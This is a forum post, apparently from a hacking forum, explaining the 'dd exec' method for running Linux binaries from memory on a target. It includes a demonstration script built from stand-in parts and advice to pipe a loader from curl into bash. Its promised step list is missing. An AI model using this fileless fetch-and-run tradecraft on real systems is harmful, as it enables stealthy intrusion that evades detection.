OP 30 April, 2023 - 06:17 PM
(This post was last modified: 02 May, 2023 - 10:01 PM by Honeypot. Edited 4 times in total.)
To execute Linux binaries without touching the disk, you can use a technique called "reflective execution", which loads and runs the binary entirely from memory instead of from a file. This technique is not new, and there are already some resources available online that showcase it.
However, in this guide we are going to focus on a specific method called "dd exec", which uses the "dd" binary to overwrite the memory of a running process with the payload and get code execution from it. The beauty of this technique is that it is a "living off the land" method: the only thing it requires on the target is the "dd" binary, which is available on most systems.
To use the dd exec method, you can follow these steps:
One thing to keep in mind is that the example command in the dd exec repository expects the binary base64-encoded. The encoding is needed because the shell cannot carry raw bytes: a NUL byte in a variable, argument or command substitution is dropped or truncates the data, and an ELF file is full of them, so an unencoded binary would arrive corrupted. Alternatively, you can upload the binary to the target system and pass it to the script as an argument, at the cost of the binary touching disk.
Also, the dd exec method requires the "dd" binary to be on the box, which may not be available on some minimal systems. The loader script itself, however, does not need to be on disk: pipe it from curl straight into bash (with "bash -s -- args", or with process substitution) so the script runs from stdin and only its arguments are passed positionally. That removes the need to drop dd exec on the box.
Conclusion
Overall, the dd exec method is a powerful technique for executing Linux binaries without touching the disk, and it can be a useful tool for penetration testers and security researchers.
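The two points above (why the payload has to be base64-encoded, and how to run the loader from stdin with arguments so nothing is written to disk) as one added example. This is not code from the dd exec repository: the payload is a constructed five-byte blob with an embedded NUL, the loader script is a constructed stand-in for a script you would normally fetch with curl (it only decodes its first argument and reports the byte count), and the URL in the comment is a placeholder.

```shell
#!/bin/sh
# Constructed stand-in for an ELF payload: five bytes with an embedded NUL.
payload() { printf 'AB\0CD'; }

# Carry the raw bytes through a shell variable. Command substitution
# cannot hold NUL, so the "binary" is corrupted (bash drops the byte and
# warns on stderr; other shells truncate). od renders the bytes as text
# so the results can be compared.
via_variable() {
  v=$(payload)
  printf '%s' "$v" | od -An -c | tr -d ' \n'
}

# Carry the bytes base64-encoded instead: the encoded text is NUL-free,
# so it survives variables, arguments and pipes, and decoding restores
# every byte, including the NUL (rendered by od as \0).
via_base64() {
  enc=$(payload | base64 | tr -d '\n')
  printf '%s' "$enc" | base64 -d | od -An -c | tr -d ' \n'
}

# Constructed stand-in for a loader script fetched over the network
# (in practice: curl -s https://example.invalid/loader.sh, a placeholder URL).
# It takes the base64 payload as $1 and treats the remaining arguments
# as the argv of the binary it would execute.
loader_script() {
  cat <<'EOF'
n=$(printf '%s' "$1" | base64 -d | wc -c | tr -d ' ')
shift
printf 'payload=%s bytes, binary args=%s\n' "$n" "$*"
EOF
}

# Loader on stdin, arguments after "--": neither the script nor the
# binary is written to disk on the target.
run_from_stdin() {
  loader_script | bash -s -- "$(payload | base64 | tr -d '\n')" "$@"
}

# Same flow with process substitution. That is bash syntax, so it is
# wrapped in bash -c; $0 carries the script text and $1.. the arguments.
run_via_procsub() {
  bash -c 'bash <(printf "%s\n" "$0") "$@"' \
    "$(loader_script)" "$(payload | base64 | tr -d '\n')" "$@"
}

# Run stand-alone to see all four results.
via_variable; echo
via_base64; echo
run_from_stdin x y
run_via_procsub x y
```

Replace the constructed loader with the real script piped from curl and the constructed payload with `base64 -w0 ./binary`, and the same two invocation shapes apply; the base64 round trip is what keeps the ELF intact on the way through the shell.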